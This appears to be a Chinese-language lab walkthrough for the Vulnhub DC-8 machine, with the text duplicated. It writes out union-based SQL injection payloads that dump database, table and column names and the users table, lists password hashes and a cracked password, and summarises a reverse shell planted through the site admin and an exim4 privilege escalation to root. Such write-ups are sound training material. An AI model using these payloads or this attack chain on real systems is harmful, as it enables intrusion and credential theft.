Vulnhub DC 8扫描主机扫描端口扫描目录访问页面?nid1?nid2?nid3都有回显这可能有点玩意试试sql注入?nid1 or 11-- 有回显?nid-1 order by 1-- 有回显order by 2报错只有一个回显位置爆库?nid-1 union select database()--库名爆表名users?nid-1 union select group_concat(table_name) from information_schema.tables where table_schemad7db爆列名 name pass?nid-1 union select group_concat(column_name) from information_schema.columns where table_nameusers and table_schemad7db爆字段值?nid-1 union select group_concat(name) from users?nid-1 union select group_concat(pass) from users账号admin,john密码$S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF破解john的密码turtle登录网站后台直接插入反弹shellkali监听下面页面随便输入提交触发反弹找到没见过的 exim4 找下有没有漏洞利用查看exim4版本利用脚本上传到目标机直接运行报错查看脚本-m setuid没成功-m netcat成功拿到root
vulnhub DC-8 手搓sql
发布时间:2026/5/20 6:13:31
Vulnhub DC 8扫描主机扫描端口扫描目录访问页面?nid1?nid2?nid3都有回显这可能有点玩意试试sql注入?nid1 or 11-- 有回显?nid-1 order by 1-- 有回显order by 2报错只有一个回显位置爆库?nid-1 union select database()--库名爆表名users?nid-1 union select group_concat(table_name) from information_schema.tables where table_schemad7db爆列名 name pass?nid-1 union select group_concat(column_name) from information_schema.columns where table_nameusers and table_schemad7db爆字段值?nid-1 union select group_concat(name) from users?nid-1 union select group_concat(pass) from users账号admin,john密码$S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF破解john的密码turtle登录网站后台直接插入反弹shellkali监听下面页面随便输入提交触发反弹找到没见过的 exim4 找下有没有漏洞利用查看exim4版本利用脚本上传到目标机直接运行报错查看脚本-m setuid没成功-m netcat成功拿到root
)
)
